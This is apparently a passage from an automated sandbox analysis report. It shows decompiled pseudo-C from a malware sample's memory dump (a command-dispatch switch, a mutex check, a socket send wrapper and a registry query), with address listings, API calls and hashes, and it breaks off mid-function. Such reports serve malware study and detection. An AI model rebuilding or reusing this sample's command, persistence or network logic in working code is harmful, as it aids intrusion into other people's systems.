                    							goto L143;
                    						case 0x48:
                    							__eflags =  *0x474124;
                    							asm("sbb eax, 0x474124");
                    							if(__eflags != 0) {
                    								__ecx = 0x4740d8;
                    								__eax = E0040A030(__ebx, 0x4740d8, __eflags);
                    							} else {
                    								__eax = E0043B4CB( *0x474128);
                    								__ecx = 0;
                    								__eflags = __eax;
                    								0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
                    								 *0x474124 = (__eflags != 0) + 1;
                    								__ecx = 0x4742d8;
                    								__edx = E00401FAB(0x4742d8);
                    								__eax = E00413425(0x4742d8, __edx, "okmode", 0x4742d8);
                    								_pop(__ecx);
                    								_pop(__ecx);
                    								__edi = 0x4740cc;
                    								__ecx = 0x4740cc;
                    								__ecx = E00401E65(0x4740cc, __edx, __ebp, __eflags, 0xb);
                    								__eax = E00401FAB(__eax);
                    								__ecx = 0x4740cc;
                    								__bl = __eax->i;
                    								__ecx = E00401E65(0x4740cc, __edx, __ebp, __eflags, 0x10);
                    								__eax = E00401FAB(__ecx);
                    								__eflags = __bl;
                    								__esi = __eax;
                    								__ecx = __cl & 0x000000ff;
                    								__ecx = 0x4740cc;
                    								__ecx = E00401E65(0x4740cc, __edx, __ebp, __eflags, 7);
                    								E00401FAB(__ecx) = E0043B4A1(__ecx, __eax);
                    								__ecx = 0x4740cc;
                    								__ecx = E00401E65(0x4740cc, __edx, __ebp, __eflags, 0x11);
                    								__eax = E00401FAB(__eax);
                    								__ecx = 0x4740cc;
                    								__ecx = E00401E65(0x4740cc, __edx, __ebp, __eflags, 0x31);
                    								__eax =  *__esi & 0x000000ff;
                    								__ecx = 0x4740d8;
                    								__eax = E00409D0B(__ebx, 0x4740d8, __eflags,  *0x474124,  *0x474128,  *__esi & 0x000000ff,  *__esi & 0x000000ff,  *__esi & 0x000000ff,  *__esi & 0x000000ff, __cl & 0x000000ff);
                    							}
                    							goto L143;
                    						case 0x49:
                    							__ebx = 0;
                    							__ecx = 0x4742d8;
                    							 *0x474124 = 0;
                    							__edx = E00401FAB(0x4742d8);
                    							__eax = E00413425(0x4742d8, __edx, "okmode", 0);
                    							_pop(__ecx);
                    							_pop(__ecx);
                    							__ecx = 0x4740d8;
                    							__eax = E0040AF51(0, 0x4740d8, __edx);
                    							goto L143;
                    						case 0x4a:
                    							__esi = 0x473f90;
                    							__ecx = 0x473f90;
                    							__eax = E0040482D(0x473f90);
                    							__ecx = 0x473f90;
                    							__eax = E004048C8(0x473f90, 0x473f90, 0x473f90);
                    							__ebx = 0;
                    							__eflags = 0;
                    							__ecx =  &_v448;
                    							__eax = E00401E65( &_v448, __edx, __ebp, 0, 0);
                    							__esp = __esp - 0x18;
                    							__ecx = __esp;
                    							__eax = E004020F6(0, __esp, __edx, __eflags, __eax);
                    							_push(0xce);
                    							__ecx = 0x473f90;
                    							E00404AA1(0x473f90, __edx, __eflags) = E00405B8E(0, __eflags);
                    							_push(0);
                    							_push(E00405B11);
                    							L142:
                    							__ecx = __esi;
                    							__eax = E00404C10(__ecx, __edx);
                    							goto L143;
                    						case 0x4b:
                    							goto L143;
                    					}
                    				}
                    				L143:
                    				_t214 =  &_v444; // 0x404421
                    				E00401E8D(_t214, _t312);
                    				E00401FD8();
                    				E00401FD8();
                    				return 0;
                    			}
































































                    0x004156f7
                    0x004156f7
                    0x0041570a
                    0x0041570c
                    0x00415714
                    0x0041571c
                    0x00415729
                    0x00415743
                    0x00415748
                    0x00415753
                    0x00415758
                    0x00415765
                    0x0041576e
                    0x00415773
                    0x00415776
                    0x0041577d
                    0x0041578c
                    0x00000000
                    0x0041579f
                    0x004157b6
                    0x004157c4
                    0x004157d2
                    0x0041582d
                    0x00415831
                    0x0041583c
                    0x00415840
                    0x00415849
                    0x00415855
                    0x00415861
                    0x0041586d
                    0x00415879
                    0x00415885
                    0x00415891
                    0x0041589a
                    0x004158a3
                    0x004158bb
                    0x004158c3
                    0x004158f0
                    0x004158f5
                    0x004158fc
                    0x00415901
                    0x00415903
                    0x00415909
                    0x0041590a
                    0x00000000
                    0x0041590a
                    0x004158c5
                    0x004158c7
                    0x004158d1
                    0x004158e1
                    0x004158d3
                    0x004158d4
                    0x004158d4
                    0x004158d1
                    0x00000000
                    0x00000000
                    0x00415948
                    0x0041594a
                    0x0041590c
                    0x0041590c
                    0x00000000
                    0x00000000
                    0x00416777
                    0x0041677b
                    0x00416780
                    0x00416783
                    0x00416785
                    0x00416787
                    0x0041678c
                    0x0041678e
                    0x00416793
                    0x00416798
                    0x00000000
                    0x00000000
                    0x00415b7c
                    0x00415b83
                    0x00415b88
                    0x00415b8b
                    0x00415b92
                    0x00415b94
                    0x00415b9f
                    0x00415ba1
                    0x00415bab
                    0x00415bad
                    0x00415baf
                    0x00415bb5
                    0x00000000
                    0x00000000
                    0x00415bd5
                    0x00415bde
                    0x00415be0
                    0x00415bec
                    0x00415bee
                    0x00000000
                    0x00000000
                    0x00415cca
                    0x00415cca
                    0x00000000
                    0x00000000
                    0x00415c44
                    0x00415c4d
                    0x00415c4f
                    0x00415c5c
                    0x00000000
                    0x00000000
                    0x00415c67
                    0x00000000
                    0x00000000
                    0x00415c8e
                    0x00000000
                    0x00000000
                    0x00415c9c
                    0x00415ca3
                    0x00415cac
                    0x00415cae
                    0x00415cbb
                    0x00415cc1
                    0x00415cc5
                    0x00000000
                    0x00000000
                    0x00415d09
                    0x00415d0b
                    0x00415d17
                    0x00415d19
                    0x00415d1f
                    0x00415d23
                    0x00415d29
                    0x00415d2e
                    0x00415d38
                    0x00415d4b
                    0x00415d51
                    0x00415d55
                    0x00415d5a
                    0x00000000
                    0x00000000
                    0x00415d65
                    0x00415d69
                    0x00415d6f
                    0x00415d74
                    0x00415d79
                    0x00415d7f
                    0x00415d87
                    0x00415d8b
                    0x00415d90
                    0x00415d93
                    0x00415d9b
                    0x00000000
                    0x00415d9b
                    0x00000000
                    0x00000000
                    0x00415da7
                    0x00415da9
                    0x00415db5
                    0x00415dc3
                    0x00000000
                    0x00000000
                    0x00415dd0
                    0x00415dd9
                    0x00415ddb
                    0x00415de1
                    0x00415de7
                    0x00415de9
                    0x00415dee
                    0x00415df0
                    0x00415df6
                    0x00415dfa
                    0x00415dff
                    0x00415e04
                    0x00415e08
                    0x00415e0d
                    0x00415e11
                    0x00415e13
                    0x00415e15
                    0x00415e46
                    0x00415e4b
                    0x00415e4e
                    0x00415e51
                    0x00415e56
                    0x00415e59
                    0x00415e5d
                    0x00415e60
                    0x00415e65
                    0x00415e6a
                    0x00415e6c
                    0x00415e71
                    0x00415e17
                    0x00415e17
                    0x00415e1c
                    0x00415e1f
                    0x00415e22
                    0x00415e27
                    0x00415e2a
                    0x00415e2e
                    0x00415e31
                    0x00415e36
                    0x00415e3b
                    0x00415e3d
                    0x00415e42
                    0x00415e42
                    0x00415e72
                    0x00415e75
                    0x00415e7e
                    0x00415e80
                    0x00415e86
                    0x00415e8b
                    0x00415e8e
                    0x00415e91
                    0x00415e95
                    0x00415e98
                    0x00415ea0
                    0x00415ea2
                    0x00415eae
                    0x00415eaf
                    0x00415eb1
                    0x00000000
                    0x00000000
                    0x00415916
                    0x0041591a
                    0x0041591f
                    0x00415922
                    0x00415926
                    0x00415929
                    0x0041592e
                    0x00415930
                    0x00415935
                    0x00000000
                    0x00000000
                    0x00415ebd
                    0x00415ec1
                    0x00415ec6
                    0x00415ec9
                    0x00415ecc
                    0x00415ed1
                    0x00415ed6
                    0x00000000
                    0x00000000
                    0x00415ee0
                    0x00415ee5
                    0x00000000
                    0x00000000
                    0x00415eef
                    0x00415ef4
                    0x00000000
                    0x00000000
                    0x00416009
                    0x0041600d
                    0x00416013
                    0x00416018
                    0x0041601d
                    0x00000000
                    0x00000000
                    0x0041602c
                    0x0041602c
                    0x0041602d
                    0x00416032
                    0x00416038
                    0x0041603d
                    0x00416040
                    0x00416043
                    0x0041604a
                    0x0041604e
                    0x00416053
                    0x00416056
                    0x00416059
                    0x0041605e
                    0x00416063
                    0x00000000
                    0x00000000
                    0x00416073
                    0x00416078
                    0x0041607a
                    0x0041607f
                    0x00416022
                    0x00416022
                    0x00000000
                    0x00000000
                    0x0041688e
                    0x0041688f
                    0x00416894
                    0x0041689a
                    0x0041689c
                    0x0041689e
                    0x0041689e
                    0x00000000
                    0x00000000
                    0x004160a3
                    0x004160a5
                    0x004160aa
                    0x004160af
                    0x004160b5
                    0x004160b7
                    0x004160bc
                    0x004160c1
                    0x004160c3
                    0x004160c9
                    0x004160cb
                    0x004160d0
                    0x004160d3
                    0x004160d5
                    0x004160d6
                    0x004160dc
                    0x004160e7
                    0x004160de
                    0x004160de
                    0x004160e3
                    0x004160ee
                    0x004160f0
                    0x004160f5
                    0x004160f6
                    0x00000000
                    0x00000000
                    0x00416100
                    0x00416106
                    0x0041610b
                    0x00000000
                    0x00000000
                    0x00416115
                    0x00416117
                    0x0041611d
                    0x00416123
                    0x00416128
                    0x0041612b
                    0x0041612e
                    0x00416135
                    0x0041613e
                    0x00416146
                    0x0041614f
                    0x00416158
                    0x0041615a
                    0x00416160
                    0x00416167
                    0x0041616b
                    0x00416172
                    0x00416174
                    0x0041617a
                    0x00416180
                    0x00416182
                    0x00416184
                    0x00000000
                    0x00000000
                    0x00416197
                    0x004161aa
                    0x00000000
                    0x00000000
                    0x004161b5
                    0x004161b5
                    0x004161b6
                    0x004161bb
                    0x004161c1
                    0x004161c6
                    0x004161c9
                    0x004161cc
                    0x004161d3
                    0x004161d7
                    0x004161dc
                    0x004161df
                    0x004161e7
                    0x004161ec
                    0x00416068
                    0x00416068
                    0x00000000
                    0x00000000
                    0x00416216
                    0x0041621f
                    0x00416227
                    0x00000000
                    0x00000000
                    0x00416232
                    0x00416239
                    0x00000000
                    0x00416247
                    0x00416247
                    0x0041624d
                    0x00000000
                    0x00000000
                    0x00416241
                    0x00416241
                    0x00416250
                    0x00416251
                    0x00416253
                    0x00416253
                    0x00416253
                    0x00416b4c
                    0x00416b4d
                    0x00416b4e
                    0x00416b50
                    0x00000000
                    0x0041694f
                    0x00000000
                    0x00000000
                    0x0041625c
                    0x0041625c
                    0x00416262
                    0x00000000
                    0x00000000
                    0x00416256
                    0x00416256
                    0x00416264
                    0x00416266
                    0x00416270
                    0x00416272
                    0x00416279
                    0x0041627d
                    0x00416284
                    0x00416286
                    0x0041628d
                    0x00416292
                    0x00416298
                    0x00416299
                    0x0041629a
                    0x004162a3
                    0x004162a6
                    0x004162af
                    0x004162b1
                    0x004162b6
                    0x004162b7
                    0x004162b8
                    0x004162be
                    0x004162c0
                    0x004162c6
                    0x004162c9
                    0x004162cd
                    0x004162d5
                    0x004162da
                    0x004162da
                    0x00000000
                    0x00000000
                    0x004162e4
                    0x004162eb
                    0x004162f1
                    0x004162f8
                    0x004162fd
                    0x00416300
                    0x00416307
                    0x0041630c
                    0x0041630e
                    0x00416315
                    0x00416321
                    0x00416328
                    0x0041632d
                    0x00416334
                    0x00000000
                    0x00000000
                    0x00416340
                    0x00416349
                    0x0041634b
                    0x00416357
                    0x0041635c
                    0x00416368
                    0x0041636a
                    0x00416370
                    0x00416372
                    0x0041637c
                    0x0041637e
                    0x00416385
                    0x0041638c
                    0x00416390
                    0x00416392
                    0x00416397
                    0x0041639a
                    0x0041639e
                    0x004163a0
                    0x004163ad
                    0x004163af
                    0x004163b9
                    0x004163bb
                    0x004163bd
                    0x004163c3
                    0x00415bb7
                    0x00415bb7
                    0x00415bbc
                    0x00415bc1
                    0x00415bc5
                    0x00415bca
                    0x00000000
                    0x00000000
                    0x004163ca
                    0x004163cf
                    0x004163d1
                    0x004163d6
                    0x004163db
                    0x004163e0
                    0x004163e2
                    0x004163e7
                    0x004163eb
                    0x004163ec
                    0x004163ee
                    0x00416406
                    0x0041640b
                    0x00416410
                    0x00416412
                    0x00416417
                    0x0041641b
                    0x0041641c
                    0x0041641e
                    0x00416439
                    0x0041643e
                    0x00416443
                    0x00416445
                    0x0041644a
                    0x0041644c
                    0x00416481
                    0x00416488
                    0x0041648f
                    0x00416493
                    0x00416495
                    0x0041649a
                    0x0041649f
                    0x004164a1
                    0x004164a6
                    0x004164a7
                    0x004164a9
                    0x004164af
                    0x004164b3
                    0x004164b8
                    0x004164bd
                    0x004164bf
                    0x004164c4
                    0x004164c6
                    0x004164cc
                    0x004164cd
                    0x004164ce
                    0x00000000
                    0x004164ce
                    0x004164ab
                    0x004164ab
                    0x004164ac
                    0x004164d0
                    0x004164d0
                    0x004164d0
                    0x0041644e
                    0x0041644e
                    0x00416451
                    0x0041645a
                    0x0041645c
                    0x00416462
                    0x00416467
                    0x00416467
                    0x00000000
                    0x00416467
                    0x00416420
                    0x00416427
                    0x00416429
                    0x0041642f
                    0x00416434
                    0x00000000
                    0x00416434
                    0x004163f0
                    0x004163f7
                    0x004163f9
                    0x004163ff
                    0x0041646a
                    0x0041646a
                    0x0041646c
                    0x0041646c
                    0x00000000
                    0x00000000
                    0x00416571
                    0x00416572
                    0x00416578
                    0x0041657a
                    0x00416588
                    0x00416592
                    0x0041659a
                    0x004165a0
                    0x004165a7
                    0x004165ab
                    0x004165af
                    0x004165b4
                    0x004165b7
                    0x004165bb
                    0x004165bd
                    0x004165c2
                    0x004165c4
                    0x004165c9
                    0x00000000
                    0x004165c9
                    0x00000000
                    0x00000000
                    0x004164de
                    0x004164e0
                    0x004164e6
                    0x004164ed
                    0x004164f6
                    0x004164f8
                    0x004164fd
                    0x0041650c
                    0x0041650f
                    0x00416516
                    0x0041651a
                    0x00416521
                    0x00416523
                    0x0041652a
                    0x00416533
                    0x0041654e
                    0x00000000
                    0x0041654e
                    0x00000000
                    0x00000000
                    0x00416557
                    0x0041655d
                    0x0041655f
                    0x00416565
                    0x0041656b
                    0x0041656b
                    0x00000000
                    0x0041656b
                    0x00000000
                    0x00000000
                    0x004165d3
                    0x004165d5
                    0x004165df
                    0x004165e1
                    0x004165e7
                    0x004165eb
                    0x004165f2
                    0x004165f4
                    0x004165f9
                    0x004165fb
                    0x004165fd
                    0x00000000
                    0x00000000
                    0x00416607
                    0x0041660b
                    0x0041660f
                    0x00416613
                    0x00416617
                    0x00416620
                    0x00416622
                    0x00416627
                    0x0041662b
                    0x0041662d
                    0x00416633
                    0x00416636
                    0x0041663c
                    0x00416640
                    0x0041664d
                    0x00416652
                    0x00000000
                    0x00000000
                    0x00416658
                    0x00000000
                    0x00000000
                    0x00416664
                    0x00416668
                    0x0041666d
                    0x00416670
                    0x00416678
                    0x00000000
                    0x00000000
                    0x00416684
                    0x00416688
                    0x0041668d
                    0x00416690
                    0x00416698
                    0x00000000
                    0x00000000
                    0x004166a4
                    0x004166a8
                    0x004166ad
                    0x004166b0
                    0x004166b8
                    0x00000000
                    0x00000000
                    0x004166c2
                    0x004166c3
                    0x004166c8
                    0x004166ca
                    0x004166d0
                    0x004166d2
                    0x004166d8
                    0x004166da
                    0x004166e4
                    0x004166eb
                    0x004166ec
                    0x004166f7
                    0x004166f9
                    0x00416704
                    0x0041670e
                    0x00416710
                    0x00000000
                    0x00000000
                    0x00416759
                    0x0041675d
                    0x00416762
                    0x00416765
                    0x0041676d
                    0x00000000
                    0x00000000
                    0x004167a3
                    0x004167a7
                    0x004167ac
                    0x004167af
                    0x004167b7
                    0x00000000
                    0x00000000
                    0x00415974
                    0x0041597b
                    0x00415982
                    0x0041598b
                    0x0041598d
                    0x00415998
                    0x0041599c
                    0x004159a3
                    0x004159ad
                    0x004159b2
                    0x004159b9
                    0x004159bd
                    0x004159bd
                    0x004159c0
                    0x004159c5
                    0x004159c8
                    0x004159cb
                    0x004159d2
                    0x004159d6
                    0x004159db
                    0x004159de
                    0x004159e1
                    0x004159e8
                    0x004159f1
                    0x004159f3
                    0x004159f8
                    0x004159fb
                    0x004159fe
                    0x00415a05
                    0x00415a0e
                    0x00415a10
                    0x00415a15
                    0x00415a18
                    0x00415a1b
                    0x00415a20
                    0x00415a27
                    0x00415a2c
                    0x00415a33
                    0x00415a3b
                    0x00415a45
                    0x00415a56
                    0x00415a56
                    0x00415a5b
                    0x00415a62
                    0x00000000
                    0x00000000
                    0x00415a6e
                    0x00415a77
                    0x00415a79
                    0x00415a85
                    0x00415a87
                    0x00000000
                    0x00000000
                    0x00415a93
                    0x00415a9c
                    0x00415a9e
                    0x00415aa4
                    0x00415aac
                    0x00415ab0
                    0x00415ab7
                    0x00415ab9
                    0x00415ac1
                    0x00415ac5
                    0x00415acb
                    0x00415acf
                    0x00415ad6
                    0x00415ada
                    0x00415adc
                    0x00415ae1
                    0x00415ae3
                    0x00415ae5
                    0x00415aea
                    0x00415af3
                    0x00415af5
                    0x00415af7
                    0x00415afc
                    0x00415afc
                    0x00415b00
                    0x00415b00
                    0x00000000
                    0x00000000
                    0x00415cd6
                    0x00415cdf
                    0x00415ce1
                    0x00415ce9
                    0x00415cf2
                    0x00415cf4
                    0x00415d01
                    0x00000000
                    0x00000000
                    0x004167c1
                    0x004167c3
                    0x004167c8
                    0x004167cd
                    0x004167d2
                    0x004167d4
                    0x004167d9
                    0x004167dd
                    0x004167de
                    0x004167e0
                    0x004167f9
                    0x004167fe
                    0x00416801
                    0x00416804
                    0x00416809
                    0x004167e2
                    0x004167e2
                    0x004167e7
                    0x004167ea
                    0x004167ed
                    0x004167f2
                    0x004167f2
                    0x0041680e
                    0x00000000
                    0x00000000
                    0x0041681a
                    0x0041681e
                    0x00416823
                    0x00416826
                    0x0041682e
                    0x00000000
                    0x00000000
                    0x00415953
                    0x00415957
                    0x0041595c
                    0x0041595f
                    0x00415967
                    0x00000000
                    0x00000000
                    0x00416085
                    0x00416089
                    0x0041608e
                    0x00416091
                    0x00416099
                    0x00000000
                    0x00000000
                    0x004161f6
                    0x004161fa
                    0x004161ff
                    0x00416202
                    0x0041620a
                    0x0041596c
                    0x0041596c
                    0x00000000
                    0x00000000
                    0x004168da
                    0x00000000
                    0x00000000
                    0x004168e4
                    0x00000000
                    0x00000000
                    0x004168ee
                    0x00000000
                    0x00000000
                    0x004168a8
                    0x004168aa
                    0x004168b5
                    0x004168b7
                    0x004168be
                    0x004168c2
                    0x004168c4
                    0x004168ce
                    0x004168d0
                    0x00000000
                    0x00000000
                    0x00416838
                    0x00000000
                    0x00000000
                    0x004168f8
                    0x004168f9
                    0x004168fe
                    0x004168fe
                    0x004168fe
                    0x00000000
                    0x00416842
                    0x00416843
                    0x00416848
                    0x00416883
                    0x0041684a
                    0x0041684a
                    0x0041684c
                    0x00416851
                    0x0041685d
                    0x00416863
                    0x00416863
                    0x00000000
                    0x00000000
                    0x00415c92
                    0x00415c69
                    0x00415c69
                    0x00000000
                    0x00000000
                    0x00415c96
                    0x00415c98
                    0x00415c99
                    0x00415c6b
                    0x00415c6b
                    0x00415c74
                    0x00415c76
                    0x00415c83
                    0x00000000
                    0x00000000
                    0x00415b0a
                    0x00415b11
                    0x00415b18
                    0x00415b1c
                    0x00415b21
                    0x00415b24
                    0x00415b27
                    0x00415b2e
                    0x00415b32
                    0x00415b37
                    0x00415b3a
                    0x00415b3d
                    0x00415b44
                    0x00415b48
                    0x00415b4d
                    0x00415b50
                    0x00415b53
                    0x00415b58
                    0x00415b5f
                    0x00415b64
                    0x00415b6b
                    0x00000000
                    0x00000000
                    0x0041671a
                    0x0041671e
                    0x00416727
                    0x00416729
                    0x0041672e
                    0x00416731
                    0x00416734
                    0x00416739
                    0x0041673e
                    0x00416748
                    0x0041674a
                    0x0041674f
                    0x00000000
                    0x00000000
                    0x00416959
                    0x0041695d
                    0x00416964
                    0x00416968
                    0x00416971
                    0x0041697a
                    0x0041697c
                    0x00416986
                    0x00416988
                    0x00416992
                    0x00416994
                    0x00416998
                    0x0041699d
                    0x004169a1
                    0x004169a6
                    0x00000000
                    0x00000000
                    0x00415bfa
                    0x00415c03
                    0x00415c05
                    0x00415c11
                    0x00415c13
                    0x00000000
                    0x00000000
                    0x00415c1f
                    0x00415c28
                    0x00415c2a
                    0x00415c36
                    0x00415c38
                    0x00000000
                    0x00000000
                    0x004169b4
                    0x004169b8
                    0x004169bf
                    0x004169c8
                    0x004169ca
                    0x004169cf
                    0x004169d3
                    0x004169d5
                    0x004169da
                    0x004169dd
                    0x004169e1
                    0x004169e3
                    0x004169e7
                    0x004169e8
                    0x004169f0
                    0x004169f4
                    0x004169fd
                    0x004169ff
                    0x00416a06
                    0x00000000
                    0x00000000
                    0x00416a5d
                    0x00416a66
                    0x00416a68
                    0x00416a6f
                    0x00416a73
                    0x00416a75
                    0x00416a7a
                    0x00416a7c
                    0x00416a7e
                    0x00416a83
                    0x00416a87
                    0x00416a8e
                    0x00416a97
                    0x00416a99
                    0x00416a9e
                    0x00416aa2
                    0x00416aa4
                    0x00416aa9
                    0x00416aac
                    0x00416ab0
                    0x00416ab2
                    0x00416ab6
                    0x00416ab7
                    0x00416abf
                    0x00416ac1
                    0x00416ac6
                    0x00416acd
                    0x00416a0b
                    0x00416a0b
                    0x00416a0c
                    0x00416a0e
                    0x00416a12
                    0x00416a17
                    0x00416a18
                    0x00416a1a
                    0x00416a1e
                    0x00416a23
                    0x00416a24
                    0x00416a26
                    0x00416a28
                    0x00416a2d
                    0x00416a2e
                    0x00416a33
                    0x00416a38
                    0x00416a3d
                    0x00416a41
                    0x00416a46
                    0x00416a4a
                    0x00416a4f
                    0x004169aa
                    0x004169aa
                    0x0041593a
                    0x0041593a
                    0x0041593e
                    0x0041593e
                    0x00000000
                    0x00000000
                    0x00415efe
                    0x00415eff
                    0x00415f04
                    0x00415fc8
                    0x00415fcd
                    0x00415f0a
                    0x00415f10
                    0x00415f16
                    0x00415f18
                    0x00415f1d
                    0x00415f1f
                    0x00415f25
                    0x00415f34
                    0x00415f36
                    0x00415f3b
                    0x00415f3c
                    0x00415f3d
                    0x00415f44
                    0x00415f4b
                    0x00415f4d
                    0x00415f54
                    0x00415f56
                    0x00415f5d
                    0x00415f5f
                    0x00415f64
                    0x00415f66
                    0x00415f6b
                    0x00415f71
                    0x00415f78
                    0x00415f80
                    0x00415f89
                    0x00415f90
                    0x00415f92
                    0x00415f9a
                    0x00415fa1
                    0x00415fa9
                    0x00415fac
                    0x00415fbe
                    0x00415fbe
                    0x00000000
                    0x00000000
                    0x00415fd7
                    0x00415fd9
                    0x00415fe4
                    0x00415fef
                    0x00415ff1
                    0x00415ff6
                    0x00415ff7
                    0x00415ff8
                    0x00415ffd
                    0x00000000
                    0x00000000
                    0x00416ad7
                    0x00416adc
                    0x00416ade
                    0x00416ae4
                    0x00416ae6
                    0x00416aeb
                    0x00416aeb
                    0x00416aed
                    0x00416af2
                    0x00416af7
                    0x00416afa
                    0x00416afd
                    0x00416b02
                    0x00416b07
                    0x00416b0e
                    0x00416b13
                    0x00416b14
                    0x00416b19
                    0x00416b19
                    0x00416b1b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041578c
                    0x00416b20
                    0x00416b20
                    0x00416b24
                    0x00416b30
                    0x00416b3c
                    0x00416b49

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventTick
                    • String ID: !D@
                    • API String ID: 180926312-604454484
                    • Opcode ID: d82fc9e1a588c889eb85b6f5b9e6804eb9463934518dc5bf932dff1d398f51db
                    • Instruction ID: 783765b06e09a2c5321ca3cdd6d4113f9b86e5b8b6f6a7273ee3027b96c250f3
                    • Opcode Fuzzy Hash: d82fc9e1a588c889eb85b6f5b9e6804eb9463934518dc5bf932dff1d398f51db
                    • Instruction Fuzzy Hash: 345155315082015AC324F732D892AEF73A5AF95314F50493FF54AA71E1EF38A946C79E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1500 40ce72-40ce9e call 401fab CreateMutexA GetLastError
                    C-Code - Quality: 100%
                    			E0040CE72() {
                    				void* _t4;
                    
                    				_t4 = CreateMutexA(0, 1, E00401FAB(0x474308)); // executed
                    				 *0x471d44 = _t4;
                    				return 0 | GetLastError() != 0x000000b7;
                    			}




                    0x0040ce81
                    0x0040ce87
                    0x0040ce9e

                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EA11,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004650AC,00000003,00000000), ref: 0040CE81
                    • GetLastError.KERNEL32 ref: 0040CE8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastMutex
                    • String ID: EGiy6hf-YWJYTZ
                    • API String ID: 1925916568-3178015452
                    • Opcode ID: 96ebb8d8f8110172954e8dda8b952706849455a51fe0494c92bd0b25cff7ca73
                    • Instruction ID: 890ccca2942b7fb17dbdfb0c9b66f7135829fa8d9d7b6e8a516db571a67dea41
                    • Opcode Fuzzy Hash: 96ebb8d8f8110172954e8dda8b952706849455a51fe0494c92bd0b25cff7ca73
                    • Instruction Fuzzy Hash: BBD012B07443019FD71817749C5A7693955DF84702F00487EB90BE95F1CFB8C4904919
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E00404AA1(void* __ecx, void* __edx, void* __eflags, char _a4, char _a8) {
                    				char _v12;
                    				char _v36;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t23;
                    				void* _t38;
                    				void* _t46;
                    				void* _t67;
                    				void* _t68;
                    				void* _t70;
                    				void* _t71;
                    
                    				_t67 = __ecx;
                    				_t23 = E0040247C();
                    				_t68 = 4;
                    				_v12 = _t23 + _t68;
                    				E0040520C(0,  &_v36, __edx, __ecx, _t71, 0xc, 0);
                    				E00436320(E004051E3(0), _t67 + 0x2c, _t68);
                    				E00436320(E004051E3(_t68),  &_v12, _t68);
                    				E00436320(E004051E3(8),  &_a4, _t68);
                    				L00403376( &_a8);
                    				if( *((intOrPtr*)(_t67 + 1)) != 0) {
                    					WaitForSingleObject( *(_t67 + 0x70), 0xffffffff);
                    					_push( &_v36);
                    					_t38 = E0040247C();
                    					_t70 =  ==  ? 0xffffffff : E00420A58(E00401FAB( &_v36), _t38);
                    					SetEvent( *(_t67 + 0x70));
                    				} else {
                    					_t46 = E00401FAB( &_v36);
                    					__imp__#19( *((intOrPtr*)(_t67 + 4)), _t46, E0040247C(), 0); // executed
                    					_t70 = _t46;
                    				}
                    				E00401FD8();
                    				E00401FD8();
                    				return _t70;
                    			}















                    0x00404aaa
                    0x00404aaf
                    0x00404ab6
                    0x00404ac1
                    0x00404ac4
                    0x00404ad8
                    0x00404aef
                    0x00404b07
                    0x00404b16
                    0x00404b1e
                    0x00404b47
                    0x00404b4d
                    0x00404b51
                    0x00404b72
                    0x00404b75
                    0x00404b20
                    0x00404b2d
                    0x00404b36
                    0x00404b3c
                    0x00404b3c
                    0x00404b7e
                    0x00404b86
                    0x00404b93

                    APIs
                    • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • WaitForSingleObject.KERNEL32(?,00000000,004045E6,?,?,00000004,?,?,00000004,0040D0AB,00000000,?), ref: 00404B47
                    • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,0040D0AB,00000000,?,?,?,?,?,?,004045E6), ref: 00404B75
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventObjectSingleWaitsend
                    • String ID:
                    • API String ID: 3963590051-0
                    • Opcode ID: 161ff1f764213e302b0a23eb9c24500826fe9530addbb23d9bc93e64fda89048
                    • Instruction ID: f1be1138b161df0ed97b97beac7af9e903466c5448271eb10b150e8a71772397
                    • Opcode Fuzzy Hash: 161ff1f764213e302b0a23eb9c24500826fe9530addbb23d9bc93e64fda89048
                    • Instruction Fuzzy Hash: F82124B29005197BCB04ABA1DC95DEE7B7CFF14314B40452FF915B21E2EF38AA19C6A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00413154(void* __ecx, void* __edx, char* _a4, char* _a8) {
                    				void* _v8;
                    				int _v12;
                    				char _v1036;
                    				void* __ebp;
                    				long _t11;
                    				long _t16;
                    				void* _t19;
                    				void* _t21;
                    				void* _t23;
                    				void* _t26;
                    
                    				_t22 = __edx;
                    				_v12 = 0x400;
                    				_t23 = __ecx;
                    				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
                    				if(_t11 != 0) {
                    					_t21 = _t23;
                    					goto L4;
                    				} else {
                    					_t16 = RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
